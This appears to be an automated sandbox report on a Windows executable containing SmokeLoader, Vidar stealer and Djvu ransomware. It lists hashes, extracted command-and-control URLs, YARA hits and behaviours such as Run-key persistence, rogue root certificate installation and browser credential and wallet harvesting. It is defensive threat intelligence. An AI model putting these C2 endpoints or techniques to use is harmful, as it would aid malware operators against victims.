bd313f9102739a231c214b4fe4f6c3a3.exe

General
Target

bd313f9102739a231c214b4fe4f6c3a3.exe

Filesize

233KB

Completed

20-10-2021 06:24

Score
10/10
MD5

bd313f9102739a231c214b4fe4f6c3a3

SHA1

728aea2174af79ab9e03cc3d31ec069d5ceb513c

SHA256

c95d04ae659ff27da971c970ec072ffbec37551120fe8c395d5455fba4139d0d

Malware Config

Extracted

Family smokeloader
Version 2020
C2

http://nusurtal4f.net/

http://netomishnetojuk.net/

http://escalivrouter.net/

http://nick22doom4.net/

http://wrioshtivsio.su/

http://nusotiso4.su/

http://rickkhtovkka.biz/

http://palisotoliso.net/

rc4.i32
rc4.i32

Extracted

Family vidar
Version 41.5
Botnet 706
C2

https://mas.to/@xeroxxx

Attributes
profile_id
706

Extracted

Family vidar
Version 41.5
Botnet 517
C2

https://mas.to/@xeroxxx

Attributes
profile_id
517

Extracted

Family djvu
C2

http://rlrz.org/lancer

Signatures 29

Filter: none

Collection
Credential Access
Defense Evasion
Discovery
Persistence
  • Detected Djvu ransomware

    Reported IOCs

    resourceyara_rule
    behavioral2/memory/4492-128-0x0000000004B10000-0x0000000004C2B000-memory.dmpfamily_djvu
    behavioral2/memory/2172-130-0x0000000000424141-mapping.dmpfamily_djvu
    behavioral2/memory/2172-129-0x0000000000400000-0x0000000000537000-memory.dmpfamily_djvu
    behavioral2/memory/2172-137-0x0000000000400000-0x0000000000537000-memory.dmpfamily_djvu
    behavioral2/memory/1560-146-0x0000000000424141-mapping.dmpfamily_djvu
    behavioral2/memory/1560-148-0x0000000000400000-0x0000000000537000-memory.dmpfamily_djvu
  • Djvu Ransomware

    Description

    Ransomware which is a variant of the STOP family.

  • SmokeLoader

    Description

    Modular backdoor trojan in use since 2014.

  • Vidar

    Description

    Vidar is an infostealer based on Arkei stealer.

  • Vidar Stealer

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral2/memory/4412-175-0x0000000004AF0000-0x0000000004BC6000-memory.dmpfamily_vidar
    behavioral2/memory/4412-176-0x0000000000400000-0x0000000002F75000-memory.dmpfamily_vidar
    behavioral2/memory/2596-194-0x0000000000400000-0x00000000004D9000-memory.dmpfamily_vidar
    behavioral2/memory/2596-195-0x00000000004A18CD-mapping.dmpfamily_vidar
    behavioral2/memory/2596-198-0x0000000000400000-0x00000000004D9000-memory.dmpfamily_vidar
    behavioral2/memory/4944-197-0x0000000004C90000-0x0000000004D66000-memory.dmpfamily_vidar
  • Downloads MZ/PE file
  • Executes dropped EXE
    78D5.exe7A0F.exe78D5.exe7C04.exe78D5.exe78D5.exeCW8KXz0H.Exebuild2.exebuild3.exebuild3.exebuild2.exemstsca.exemstsca.exe

    Reported IOCs

    pidprocess
    449278D5.exe
    44127A0F.exe
    217278D5.exe
    31407C04.exe
    68878D5.exe
    156078D5.exe
    1952CW8KXz0H.Exe
    4944build2.exe
    3488build3.exe
    196build3.exe
    2596build2.exe
    1356mstsca.exe
    1848mstsca.exe
  • Deletes itself

    Reported IOCs

    pidprocess
    3060
  • Loads dropped DLL
    bd313f9102739a231c214b4fe4f6c3a3.exemsiexec.exe7A0F.exebuild2.exe

    Reported IOCs

    pidprocess
    3472bd313f9102739a231c214b4fe4f6c3a3.exe
    4956msiexec.exe
    44127A0F.exe
    44127A0F.exe
    2596build2.exe
    2596build2.exe
  • Modifies file permissions
    icacls.exe

    Tags

    TTPs

    File Permissions Modification

    Reported IOCs

    pidprocess
    656icacls.exe
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    TTPs

    Data from Local SystemCredentials in Files
  • Accesses 2FA software files, possible credential harvesting

    TTPs

    Data from Local SystemCredentials in Files
  • Accesses cryptocurrency files/wallets, possible credential harvesting

    Tags

    TTPs

    Data from Local SystemCredentials in Files
  • Adds Run key to start application
    78D5.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\5715edab-3042-4097-9ffa-cf70482c474f\\78D5.exe\" --AutoStart"78D5.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    Tags

    TTPs

    Query Registry
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flowioc
    33api.2ip.ua
    26api.2ip.ua
    27api.2ip.ua
  • Suspicious use of SetThreadContext
    78D5.exe78D5.exebuild3.exebuild2.exemstsca.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 4492 set thread context of 2172449278D5.exe78D5.exe
    PID 688 set thread context of 156068878D5.exe78D5.exe
    PID 3488 set thread context of 1963488build3.exebuild3.exe
    PID 4944 set thread context of 25964944build2.exebuild2.exe
    PID 1356 set thread context of 18481356mstsca.exemstsca.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Checks SCSI registry key(s)
    bd313f9102739a231c214b4fe4f6c3a3.exe

    Description

    SCSI information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistryPeripheral Device DiscoverySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSIbd313f9102739a231c214b4fe4f6c3a3.exe
    Key queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSIbd313f9102739a231c214b4fe4f6c3a3.exe
    Key enumerated\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSIbd313f9102739a231c214b4fe4f6c3a3.exe
  • Checks processor information in registry
    build2.exe7A0F.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringbuild2.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\07A0F.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString7A0F.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0build2.exe
  • Creates scheduled task(s)
    schtasks.exeschtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pidprocess
    684schtasks.exe
    3184schtasks.exe
  • Delays execution with timeout.exe
    timeout.exetimeout.exe

    Tags

    Reported IOCs

    pidprocess
    2112timeout.exe
    3576timeout.exe
  • Kills process with taskkill
    taskkill.exetaskkill.exetaskkill.exe

    Tags

    Reported IOCs

    pidprocess
    2396taskkill.exe
    1976taskkill.exe
    4448taskkill.exe
  • Modifies system certificate store
    build2.exe78D5.exe

    TTPs

    Install Root CertificateModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8build2.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f6362000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60b000000010000001a0000004900530052004700200052006f006f0074002000580031000000090000000100000016000000301406082b0601050507030206082b0601050507030114000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e1d000000010000001000000073b6876195f5d18e048510422aef04e3030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e820000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827build2.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 1900000001000000100000002fe1f70bb05d7c92335bc5e05b984da6030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e81d000000010000001000000073b6876195f5d18e048510422aef04e314000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e090000000100000016000000301406082b0601050507030206082b060105050703010b000000010000001a0000004900530052004700200052006f006f007400200058003100000062000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f6320000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827build2.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e0f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f6362000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60b000000010000001a0000004900530052004700200052006f006f0074002000580031000000090000000100000016000000301406082b0601050507030206082b0601050507030114000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e1d000000010000001000000073b6876195f5d18e048510422aef04e3030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e81900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827build2.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da6030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e81d000000010000001000000073b6876195f5d18e048510422aef04e314000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e090000000100000016000000301406082b0601050507030206082b060105050703010b000000010000001a0000004900530052004700200052006f006f007400200058003100000062000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f630400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827build2.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E34978D5.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e78D5.exe
  • Suspicious behavior: EnumeratesProcesses
    bd313f9102739a231c214b4fe4f6c3a3.exe

    Reported IOCs

    pidprocess
    3472bd313f9102739a231c214b4fe4f6c3a3.exe
    3472bd313f9102739a231c214b4fe4f6c3a3.exe
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
    3060
  • Suspicious behavior: GetForegroundWindowSpam

    Reported IOCs

    pidprocess
    3060
  • Suspicious behavior: MapViewOfSection
    bd313f9102739a231c214b4fe4f6c3a3.exe

    Reported IOCs

    pidprocess
    3472bd313f9102739a231c214b4fe4f6c3a3.exe
  • Suspicious use of AdjustPrivilegeToken
    taskkill.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeDebugPrivilege2396taskkill.exe
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
    Token: SeShutdownPrivilege3060
    Token: SeCreatePagefilePrivilege3060
